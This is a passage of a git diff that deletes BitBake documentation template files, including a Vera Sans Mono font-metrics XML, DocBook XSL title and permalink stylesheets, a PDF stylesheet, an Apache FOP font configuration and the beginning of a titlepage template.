-<?xml version="1.0" encoding="UTF-8"?><font-metrics metrics-version="2" type="TYPE0"><font-name>BitstreamVeraSansMono-Roman</font-name><full-name>Bitstream Vera Sans Mono</full-name><family-name>Bitstream Vera Sans Mono</family-name><embed/><cap-height>729</cap-height><x-height>546</x-height><ascender>759</ascender><descender>-240</descender><bbox><left>-4</left><bottom>-235</bottom><right>605</right><top>928</top></bbox><flags>34</flags><stemv>0</stemv><italicangle>0</italicangle><subtype>TYPE0</subtype><multibyte-extras><cid-type>CIDFontType2</cid-type><default-width>0</default-width><bfranges><bf gi="3" ue="126" us="32"/><bf gi="172" ue="160" us="160"/><bf gi="163" ue="161" us="161"/><bf gi="132" ue="163" us="162"/><bf gi="189" ue="164" us="164"/><bf gi="150" ue="165" us="165"/><bf gi="231" ue="166" us="166"/><bf gi="134" ue="167" us="167"/><bf gi="142" ue="168" us="168"/><bf gi="139" ue="169" us="169"/><bf gi="157" ue="170" us="170"/><bf gi="169" ue="171" us="171"/><bf gi="164" ue="172" us="172"/><bf gi="256" ue="173" us="173"/><bf gi="138" ue="174" us="174"/><bf gi="217" ue="175" us="175"/><bf gi="131" ue="176" us="176"/><bf gi="147" ue="177" us="177"/><bf gi="241" ue="179" us="178"/><bf gi="141" ue="180" us="180"/><bf gi="151" ue="181" us="181"/><bf gi="136" ue="182" us="182"/><bf gi="195" ue="183" us="183"/><bf gi="221" ue="184" us="184"/><bf gi="240" ue="185" us="185"/><bf gi="158" ue="186" us="186"/><bf gi="170" ue="187" us="187"/><bf gi="243" ue="190" us="188"/><bf gi="162" ue="191" us="191"/><bf gi="173" ue="192" us="192"/><bf gi="201" ue="193" us="193"/><bf gi="199" ue="194" us="194"/><bf gi="174" ue="195" us="195"/><bf gi="98" ue="197" us="196"/><bf gi="144" ue="198" us="198"/><bf gi="100" ue="199" us="199"/><bf gi="203" ue="200" us="200"/><bf gi="101" ue="201" us="201"/><bf gi="200" ue="202" us="202"/><bf gi="202" ue="203" us="203"/><bf gi="207" ue="204" us="204"/><bf gi="204" ue="207" us="205"/><bf gi="232" ue="208" us="208"/><bf gi="102" ue="209" us="209"/><bf gi="210" ue="210" us="210"/><bf gi="208" ue="212" us="211"/><bf gi="175" ue="213" us="213"/><bf gi="103" ue="214" us="214"/><bf gi="239" ue="215" us="215"/><bf gi="145" ue="216" us="216"/><bf gi="213" ue="217" us="217"/><bf gi="211" ue="219" us="218"/><bf gi="104" ue="220" us="220"/><bf gi="234" ue="221" us="221"/><bf gi="236" ue="222" us="222"/><bf gi="137" ue="223" us="223"/><bf gi="106" ue="224" us="224"/><bf gi="105" ue="225" us="225"/><bf gi="107" ue="226" us="226"/><bf gi="109" ue="227" us="227"/><bf gi="108" ue="228" us="228"/><bf gi="110" ue="229" us="229"/><bf gi="160" ue="230" us="230"/><bf gi="111" ue="231" us="231"/><bf gi="113" ue="232" us="232"/><bf gi="112" ue="233" us="233"/><bf gi="114" ue="235" us="234"/><bf gi="117" ue="236" us="236"/><bf gi="116" ue="237" us="237"/><bf gi="118" ue="239" us="238"/><bf gi="233" ue="240" us="240"/><bf gi="120" ue="241" us="241"/><bf gi="122" ue="242" us="242"/><bf gi="121" ue="243" us="243"/><bf gi="123" ue="244" us="244"/><bf gi="125" ue="245" us="245"/><bf gi="124" ue="246" us="246"/><bf gi="184" ue="247" us="247"/><bf gi="161" ue="248" us="248"/><bf gi="127" ue="249" us="249"/><bf gi="126" ue="250" us="250"/><bf gi="128" ue="252" us="251"/><bf gi="235" ue="253" us="253"/><bf gi="237" ue="254" us="254"/><bf gi="186" ue="255" us="255"/><bf gi="251" ue="263" us="262"/><bf gi="253" ue="269" us="268"/><bf gi="0" ue="270" us="270"/><bf gi="0" ue="271" us="271"/><bf gi="0" ue="272" us="272"/><bf gi="255" ue="273" us="273"/><bf gi="246" ue="287" us="286"/><bf gi="248" ue="304" us="304"/><bf gi="214" ue="305" us="305"/><bf gi="225" ue="322" us="321"/><bf gi="176" ue="339" us="338"/><bf gi="249" ue="351" us="350"/><bf gi="227" ue="353" us="352"/><bf gi="187" ue="376" us="376"/><bf gi="229" ue="382" us="381"/><bf gi="166" ue="402" us="402"/><bf gi="215" ue="710" us="710"/><bf gi="224" ue="711" us="711"/><bf gi="218" ue="730" us="728"/><bf gi="223" ue="731" us="731"/><bf gi="216" ue="732" us="732"/><bf gi="222" ue="733" us="733"/><bf gi="159" ue="937" us="937"/><bf gi="155" ue="960" us="960"/><bf gi="178" ue="8212" us="8211"/><bf gi="0" ue="8213" us="8213"/><bf gi="0" ue="8214" us="8214"/><bf gi="0" ue="8215" us="8215"/><bf gi="182" ue="8217" us="8216"/><bf gi="196" ue="8218" us="8218"/><bf gi="0" ue="8219" us="8219"/><bf gi="180" ue="8221" us="8220"/><bf gi="197" ue="8222" us="8222"/><bf gi="0" ue="8223" us="8223"/><bf gi="130" ue="8224" us="8224"/><bf gi="194" ue="8225" us="8225"/><bf gi="135" ue="8226" us="8226"/><bf gi="0" ue="8227" us="8227"/><bf gi="0" ue="8228" us="8228"/><bf gi="0" ue="8229" us="8229"/><bf gi="171" ue="8230" us="8230"/><bf gi="198" ue="8240" us="8240"/><bf gi="190" ue="8250" us="8249"/><bf gi="258" ue="8364" us="8364"/><bf gi="140" ue="8482" us="8482"/><bf gi="152" ue="8706" us="8706"/><bf gi="0" ue="8707" us="8707"/><bf gi="0" ue="8708" us="8708"/><bf gi="0" ue="8709" us="8709"/><bf gi="168" ue="8710" us="8710"/><bf gi="154" ue="8719" us="8719"/><bf gi="0" ue="8720" us="8720"/><bf gi="153" ue="8721" us="8721"/><bf gi="238" ue="8722" us="8722"/><bf gi="0" ue="8723" us="8723"/><bf gi="0" ue="8724" us="8724"/><bf gi="188" ue="8725" us="8725"/><bf gi="0" ue="8726" us="8726"/><bf gi="0" ue="8727" us="8727"/><bf gi="0" ue="8728" us="8728"/><bf gi="257" ue="8729" us="8729"/><bf gi="165" ue="8730" us="8730"/><bf gi="0" ue="8731" us="8731"/><bf gi="0" ue="8732" us="8732"/><bf gi="0" ue="8733" us="8733"/><bf gi="146" ue="8734" us="8734"/><bf gi="156" ue="8747" us="8747"/><bf gi="167" ue="8776" us="8776"/><bf gi="143" ue="8800" us="8800"/><bf gi="0" ue="8801" us="8801"/><bf gi="0" ue="8802" us="8802"/><bf gi="0" ue="8803" us="8803"/><bf gi="148" ue="8805" us="8804"/><bf gi="185" ue="9674" us="9674"/><bf gi="192" ue="64258" us="64257"/><bf gi="0" ue="65535" us="65535"/></bfranges><cid-widths start-index="0"><wx w="602"/><wx w="0"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/></cid-widths></multibyte-extras></font-metrics>
\ No newline at end of file
diff --git a/bitbake/doc/template/component.title.xsl b/bitbake/doc/template/component.title.xsl
deleted file mode 100644
index faef043268..0000000000
--- a/bitbake/doc/template/component.title.xsl
+++ /dev/null
@@ -1,39 +0,0 @@
-<xsl:stylesheet version="1.0"
-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
-  xmlns:d="http://docbook.org/ns/docbook"
-  xmlns="http://www.w3.org/1999/xhtml"
-  exclude-result-prefixes="d">
-  
-  <xsl:template name="component.title">
-    <xsl:param name="node" select="."/>
-    
-    <xsl:variable name="level">
-      <xsl:choose>
-        <xsl:when test="ancestor::d:section">
-          <xsl:value-of select="count(ancestor::d:section)+1"/>
-        </xsl:when>
-        <xsl:when test="ancestor::d:sect5">6</xsl:when>
-        <xsl:when test="ancestor::d:sect4">5</xsl:when>
-        <xsl:when test="ancestor::d:sect3">4</xsl:when>
-        <xsl:when test="ancestor::d:sect2">3</xsl:when>
-        <xsl:when test="ancestor::d:sect1">2</xsl:when>
-        <xsl:otherwise>1</xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-    <xsl:element name="h{$level+1}" namespace="http://www.w3.org/1999/xhtml">
-      <xsl:attribute name="class">title</xsl:attribute>
-      <xsl:if test="$generate.id.attributes = 0">
-        <xsl:call-template name="anchor">
-          <xsl:with-param name="node" select="$node"/>
-          <xsl:with-param name="conditional" select="0"/>
-        </xsl:call-template>
-      </xsl:if>
-      <xsl:apply-templates select="$node" mode="object.title.markup">
-        <xsl:with-param name="allow-anchors" select="1"/>
-      </xsl:apply-templates>
-      <xsl:call-template name="permalink">
-        <xsl:with-param name="node" select="$node"/>
-      </xsl:call-template>
-    </xsl:element>
-  </xsl:template>
-</xsl:stylesheet>
diff --git a/bitbake/doc/template/db-pdf.xsl b/bitbake/doc/template/db-pdf.xsl
deleted file mode 100644
index 3dd065a57e..0000000000
--- a/bitbake/doc/template/db-pdf.xsl
+++ /dev/null
@@ -1,64 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-  
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/current/fo/docbook.xsl" />
-
-  <!-- check project-plan.sh for how this is generated, needed to tweak 
-       the cover page     
-    -->
-  <xsl:include href="/tmp/titlepage.xsl"/> 
-
-  <!-- To force a page break in document, i.e per section add a 
-      <?hard-pagebreak?> tag.
-  -->
- <xsl:template match="processing-instruction('hard-pagebreak')">
-   <fo:block break-before='page' />
- </xsl:template>
-
-  <!--Fix for defualt indent getting TOC all wierd..
-      See http://sources.redhat.com/ml/docbook-apps/2005-q1/msg00455.html 
-      FIXME: must be a better fix
-    -->
-  <xsl:param name="body.start.indent" select="'0'"/>
-  <!--<xsl:param name="title.margin.left" select="'0'"/>-->
-
-  <!-- stop long-ish header titles getting wrapped -->
-  <xsl:param name="header.column.widths">1 10 1</xsl:param>
-
-  <!-- customise headers and footers a little --> 
-
-  <xsl:template name="head.sep.rule">
-   <xsl:if test="$header.rule != 0">
-     <xsl:attribute name="border-bottom-width">0.5pt</xsl:attribute>
-     <xsl:attribute name="border-bottom-style">solid</xsl:attribute>
-     <xsl:attribute name="border-bottom-color">#cccccc</xsl:attribute>
-   </xsl:if>
-  </xsl:template>
-
-  <xsl:template name="foot.sep.rule">
-    <xsl:if test="$footer.rule != 0">
-     <xsl:attribute name="border-top-width">0.5pt</xsl:attribute>
-     <xsl:attribute name="border-top-style">solid</xsl:attribute>
-     <xsl:attribute name="border-top-color">#cccccc</xsl:attribute>
-    </xsl:if>
-  </xsl:template>
-
-  <xsl:attribute-set name="header.content.properties">
-    <xsl:attribute name="color">#cccccc</xsl:attribute>
-  </xsl:attribute-set>
-
-  <xsl:attribute-set name="footer.content.properties">
-    <xsl:attribute name="color">#cccccc</xsl:attribute>
-  </xsl:attribute-set>
-
- 
-  <!-- general settings -->
-
-  <xsl:param name="fop1.extensions" select="1"></xsl:param>
-  <xsl:param name="paper.type" select="'A4'"></xsl:param>
-  <xsl:param name="section.autolabel" select="1"></xsl:param>
-  <xsl:param name="body.font.family" select="'verasans'"></xsl:param>
-  <xsl:param name="title.font.family" select="'verasans'"></xsl:param>
-  <xsl:param name="monospace.font.family" select="'veramono'"></xsl:param>
-
-</xsl:stylesheet>
diff --git a/bitbake/doc/template/division.title.xsl b/bitbake/doc/template/division.title.xsl
deleted file mode 100644
index 9c843bc7c4..0000000000
--- a/bitbake/doc/template/division.title.xsl
+++ /dev/null
@@ -1,25 +0,0 @@
-<xsl:stylesheet version="1.0"
-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
-  xmlns:d="http://docbook.org/ns/docbook"
-  xmlns="http://www.w3.org/1999/xhtml"
-  exclude-result-prefixes="d">
-  
-  <xsl:template name="division.title">
-    <xsl:param name="node" select="."/>
-    
-    <h1>
-      <xsl:attribute name="class">title</xsl:attribute>
-      <xsl:call-template name="anchor">
-        <xsl:with-param name="node" select="$node"/>
-        <xsl:with-param name="conditional" select="0"/>
-      </xsl:call-template>
-      <xsl:apply-templates select="$node" mode="object.title.markup">
-        <xsl:with-param name="allow-anchors" select="1"/>
-      </xsl:apply-templates>
-      <xsl:call-template name="permalink">
-        <xsl:with-param name="node" select="$node"/>
-      </xsl:call-template>
-    </h1>
-  </xsl:template>
-</xsl:stylesheet>
-
diff --git a/bitbake/doc/template/fop-config.xml b/bitbake/doc/template/fop-config.xml
deleted file mode 100644
index 09cc5ca0f5..0000000000
--- a/bitbake/doc/template/fop-config.xml
+++ /dev/null
@@ -1,58 +0,0 @@
-<fop version="1.0">
-
-  <!-- Strict user configuration -->
-  <strict-configuration>true</strict-configuration>
-
-  <!-- Strict FO validation -->
-  <strict-validation>true</strict-validation>
-
-   <!--
-    Set the baseDir so common/openedhand.svg references in plans still
-    work ok. Note, relative file references to current dir should still work.
-    -->	
-  <base>../template</base>
-  <font-base>../template</font-base>
- 
-  <!-- Source resolution in dpi (dots/pixels per inch) for determining the
-       size of pixels in SVG and bitmap images, default: 72dpi -->
-  <!-- <source-resolution>72</source-resolution> -->
-  <!-- Target resolution in dpi (dots/pixels per inch) for specifying the
-       target resolution for generated bitmaps, default: 72dpi -->
-  <!-- <target-resolution>72</target-resolution> -->
- 
-  <!-- default page-height and page-width, in case
-       value is specified as auto -->
-  <default-page-settings height="11in" width="8.26in"/> 
- 
-  <!-- <use-cache>false</use-cache> -->
- 
-  <renderers>
-    <renderer mime="application/pdf">
-      <fonts>
-        <font  metrics-file="VeraMono.xml"
-               kerning="yes" 
-               embed-url="VeraMono.ttf">
-          <font-triplet name="veramono" style="normal" weight="normal"/>
-        </font>
-
-        <font  metrics-file="VeraMoBd.xml"
-               kerning="yes" 
-               embed-url="VeraMoBd.ttf">
-          <font-triplet name="veramono" style="normal" weight="bold"/>
-        </font>
-
-        <font  metrics-file="Vera.xml"
-               kerning="yes" 
-               embed-url="Vera.ttf">
-          <font-triplet name="verasans" style="normal" weight="normal"/>
-          <font-triplet name="verasans" style="normal" weight="bold"/>
-          <font-triplet name="verasans" style="italic" weight="normal"/>
-          <font-triplet name="verasans" style="italic" weight="bold"/>
-        </font>
-        
-        <auto-detect/>
-      </fonts>
-    </renderer>
-  </renderers>
-</fop>
-
diff --git a/bitbake/doc/template/formal.object.heading.xsl b/bitbake/doc/template/formal.object.heading.xsl
deleted file mode 100644
index 4f3900d165..0000000000
--- a/bitbake/doc/template/formal.object.heading.xsl
+++ /dev/null
@@ -1,21 +0,0 @@
-<xsl:stylesheet version="1.0"
-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
-  xmlns:d="http://docbook.org/ns/docbook"
-  xmlns="http://www.w3.org/1999/xhtml"
-  exclude-result-prefixes="d">
-  
-  <xsl:template name="formal.object.heading">
-    <xsl:param name="object" select="."/>
-    <xsl:param name="title">
-      <xsl:apply-templates select="$object" mode="object.title.markup">
-        <xsl:with-param name="allow-anchors" select="1"/>
-      </xsl:apply-templates>
-    </xsl:param>
-    <p class="title">
-      <b><xsl:copy-of select="$title"/></b>
-      <xsl:call-template name="permalink">
-        <xsl:with-param name="node" select="$object"/>
-      </xsl:call-template>
-    </p>
-  </xsl:template>
-</xsl:stylesheet>
\ No newline at end of file
diff --git a/bitbake/doc/template/gloss-permalinks.xsl b/bitbake/doc/template/gloss-permalinks.xsl
deleted file mode 100644
index 6bf58116f6..0000000000
--- a/bitbake/doc/template/gloss-permalinks.xsl
+++ /dev/null
@@ -1,14 +0,0 @@
-<xsl:stylesheet version="1.0"

-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

-  xmlns:d="http://docbook.org/ns/docbook"

-  xmlns="http://www.w3.org/1999/xhtml">

-

-  <xsl:template match="glossentry/glossterm">

-    <xsl:apply-imports/>

-    <xsl:if test="$generate.permalink != 0">

-      <xsl:call-template name="permalink">

-        <xsl:with-param name="node" select=".."/>

-      </xsl:call-template>

-    </xsl:if>

-  </xsl:template>

-</xsl:stylesheet>

diff --git a/bitbake/doc/template/permalinks.xsl b/bitbake/doc/template/permalinks.xsl
deleted file mode 100644
index d2a1c14524..0000000000
--- a/bitbake/doc/template/permalinks.xsl
+++ /dev/null
@@ -1,25 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<xsl:stylesheet version="1.0"
-  xmlns="http://www.w3.org/1999/xhtml"
-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-
-  <xsl:param name="generate.permalink" select="1"/>
-  <xsl:param name="permalink.text">¶</xsl:param>
-
-  <xsl:template name="permalink">
-    <xsl:param name="node"/>
-
-    <xsl:if test="$generate.permalink != '0'">
-      <span class="permalink">
-        <a alt="Permalink" title="Permalink">
-          <xsl:attribute name="href">
-            <xsl:call-template name="href.target">
-              <xsl:with-param name="object"  select="$node"/>
-            </xsl:call-template>
-          </xsl:attribute>
-          <xsl:copy-of select="$permalink.text"/>
-        </a>
-      </span>
-    </xsl:if>
-  </xsl:template>
-</xsl:stylesheet>
diff --git a/bitbake/doc/template/section.title.xsl b/bitbake/doc/template/section.title.xsl
deleted file mode 100644
index 5c6ff9a96e..0000000000
--- a/bitbake/doc/template/section.title.xsl
+++ /dev/null
@@ -1,55 +0,0 @@
-<xsl:stylesheet version="1.0"
-  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
-  xmlns:d="http://docbook.org/ns/docbook"
-  xmlns="http://www.w3.org/1999/xhtml" exclude-result-prefixes="d">
-
-  <xsl:template name="section.title">
-    <xsl:variable name="section"
-      select="(ancestor::section |
-               ancestor::simplesect|
-               ancestor::sect1|
-               ancestor::sect2|
-               ancestor::sect3|
-               ancestor::sect4|
-               ancestor::sect5)[last()]"/>
-
-    <xsl:variable name="renderas">
-      <xsl:choose>
-        <xsl:when test="$section/@renderas = 'sect1'">1</xsl:when>
-        <xsl:when test="$section/@renderas = 'sect2'">2</xsl:when>
-        <xsl:when test="$section/@renderas = 'sect3'">3</xsl:when>
-        <xsl:when test="$section/@renderas = 'sect4'">4</xsl:when>
-        <xsl:when test="$section/@renderas = 'sect5'">5</xsl:when>
-        <xsl:otherwise><xsl:value-of select="''"/></xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-
-    <xsl:variable name="level">
-      <xsl:choose>
-        <xsl:when test="$renderas != ''">
-          <xsl:value-of select="$renderas"/>
-        </xsl:when>
-        <xsl:otherwise>
-          <xsl:call-template name="section.level">
-            <xsl:with-param name="node" select="$section"/>
-          </xsl:call-template>
-        </xsl:otherwise>
-      </xsl:choose>
-    </xsl:variable>
-
-    <xsl:call-template name="section.heading">
-      <xsl:with-param name="section" select="$section"/>
-      <xsl:with-param name="level" select="$level"/>
-      <xsl:with-param name="title">
-        <xsl:apply-templates select="$section" mode="object.title.markup">
-          <xsl:with-param name="allow-anchors" select="1"/>
-        </xsl:apply-templates>
-        <xsl:if test="$level &gt; 0">
-          <xsl:call-template name="permalink">
-            <xsl:with-param name="node" select="$section"/>
-          </xsl:call-template>
-        </xsl:if>
-      </xsl:with-param>
-    </xsl:call-template>
-  </xsl:template>
-</xsl:stylesheet>
diff --git a/bitbake/doc/template/titlepage.templates.xml b/bitbake/doc/template/titlepage.templates.xml
deleted file mode 100644
index 38ec11a4c3..0000000000
--- a/bitbake/doc/template/titlepage.templates.xml
+++ /dev/null
@@ -1,1259 +0,0 @@
-<!DOCTYPE t:templates [
-<!ENTITY hsize0 "10pt">
-<!ENTITY hsize1 "12pt">
-<!ENTITY hsize2 "14.4pt">
-<!ENTITY hsize3 "17.28pt">
-<!ENTITY hsize4 "20.736pt">
-<!ENTITY hsize5 "24.8832pt">
-<!ENTITY hsize0space "7.5pt"> <!-- 0.75 * hsize0 -->
-<!ENTITY hsize1space "9pt"> <!-- 0.75 * hsize1 -->
-<!ENTITY hsize2space "10.8pt"> <!-- 0.75 * hsize2 -->
-<!ENTITY hsize3space "12.96pt"> <!-- 0.75 * hsize3 -->
-<!ENTITY hsize4space "15.552pt"> <!-- 0.75 * hsize4 -->
-<!ENTITY hsize5space "18.6624pt"> <!-- 0.75 * hsize5 -->
-]>
-<t:templates xmlns:t="http://nwalsh.com/docbook/xsl/template/1.0"
-	     xmlns:param="http://nwalsh.com/docbook/xsl/template/1.0/param"
-             xmlns:fo="http://www.w3.org/1999/XSL/Format"
-             xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-
-<!-- ********************************************************************
-     $Id: titlepage.templates.xml,v 1.23 2003/12/16 00:30:49 bobstayton Exp $
-     ********************************************************************
-
-     This file is part of the DocBook XSL Stylesheet distribution.
-     See ../README or http://docbook.sf.net/ for copyright
-     and other information.
-
-     ******************************************************************** -->
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="article" t:wrapper="fo:block"
-             font-family="{$title.fontset}">
-
-  <t:titlepage-content t:side="recto"
-             text-align="center">
-
-    <mediaobject/>
-
-    <title t:named-template="component.title"
-	   param:node="ancestor-or-self::article[1]"
-	   keep-with-next="always"
-	   font-size="&hsize5;"
-	   font-weight="bold"/>
-
-    <subtitle param:node="ancestor-or-self::article[1]"
-	   keep-with-next="always"
-	   font-size="&hsize3;"
-	   font-weight="bold"
-       space-after="0.8em"/>
-
-    <corpauthor space-before="0.5em"
-                font-size="&hsize3;"/>
-    <authorgroup space-before="0.5em"
-                 font-size="&hsize2;"/>
-    <author space-before="0.5em"
-            font-size="&hsize2;"
-            space-after="0.8em"/>
-
-    <email font-size="&hsize2;"/>
-
-    <othercredit space-before="0.5em"/>
-    <releaseinfo space-before="0.5em"/>
-    <copyright space-before="0.5em"/>
-    <legalnotice text-align="start"
-                 margin-left="0.5in"
-                 margin-right="0.5in"
-                 font-family="{$body.fontset}"/>
-    <pubdate space-before="0.5em"/>
-	<para></para>
-    <revision space-before="0.5em"/>
-    <revhistory space-before="0.5em"/>
-    <abstract space-before="0.5em"
-	      text-align="start"
-	      margin-left="0.5in"
-              margin-right="0.5in"
-              font-family="{$body.fontset}"/>
-
-    <para></para>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="set" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-      <title
-	     t:named-template="division.title"
-	     param:node="ancestor-or-self::set[1]"
-	     text-align="center"
-	     font-size="&hsize5;"
-	     space-before="&hsize5space;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    <subtitle
-	      font-family="{$title.fontset}"
-	      text-align="center"/>
-    <corpauthor/>
-    <authorgroup/>
-    <author/>
-    <othercredit/>
-    <releaseinfo/>
-    <copyright/>
-    <legalnotice/>
-    <pubdate/>
-    <revision/>
-    <revhistory/>
-    <abstract/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-  <t:titlepage t:element="book" t:wrapper="fo:block">
-    <t:titlepage-content t:side="recto">
-
-      <mediaobject/>
-
-<!--
-
-# If you leave this block of code in then the text title in the
-# <title>BitBake User Manual</title> statement of the
-# bitbake-user-manual.xml file is rendered on the title page below the
-# image.  Commenting it out gets it out of there yet allows it
-# to be retained in the tab text for the HTML version of the
-# manual.
-
-      <title
-	     t:named-template="division.title"
-	     param:node="ancestor-or-self::book[1]"
-	     text-align="center"
-	     font-size="&hsize5;"
-	     space-before="&hsize5space;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
--->
-      <subtitle
-		text-align="center"
-		font-size="&hsize4;"
-		space-before="&hsize4space;"
-		font-family="{$title.fontset}"/>
-      <corpauthor font-size="&hsize3;"
-		  keep-with-next="always"
-		  space-before="2in"/>
-      <authorgroup space-before="2in"/>
-      <author font-size="&hsize3;"
-	      space-before="&hsize2space;"
-	      keep-with-next="always"/>
-    </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
-<!--
-# If you leave this block of code in then the text title in the
-# <title>BitBake User Manual</title> statement of the
-# bitbake-user-manual.xml file is rendered on the title page below the
-# image.  Commenting it out gets it out of there yet allows it
-# to be retained in the tab text for the HTML version of the
-# manual.
-
-      <title
-	     t:named-template="book.verso.title"
-	     font-size="&hsize2;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
--->
-      <corpauthor/>
-      <authorgroup t:named-template="verso.authorgroup"/>
-      <author/>
-      <othercredit/>
-      <pubdate space-before="1em"/>
-      <copyright/>
-      <abstract/>
-      <legalnotice font-size="8pt"/>
-  </t:titlepage-content>
-
-  <t:titlepage-separator>
-      <fo:block break-after="page"/>
-  </t:titlepage-separator>
-
-  <t:titlepage-before t:side="recto">
-  </t:titlepage-before>
-
-  <t:titlepage-before t:side="verso">
-      <fo:block break-after="page"/>
-  </t:titlepage-before>
-</t:titlepage>
-
-<!-- ==================================================================== -->
-
-<t:titlepage t:element="part" t:wrapper="fo:block">
-  <t:titlepage-content t:side="recto">
-      <title
-	     t:named-template="division.title"
-	     param:node="ancestor-or-self::part[1]"
-	     text-align="center"
-	     font-size="&hsize5;"
-	     space-before="&hsize5space;"
-	     font-weight="bold"
-	     font-family="{$title.fontset}"/>
-    <subtitle
-	      text-align="center"
-	      font-size="&hsize4;"
-	      space-before="&hsize4space;"
-	      font-weight='bold'
-	      font-style='italic'
-	      font-family="{$title.fontset}"/>
-  </t:titlepage-content>
-
-  <t:titlepage-content t:side="verso">
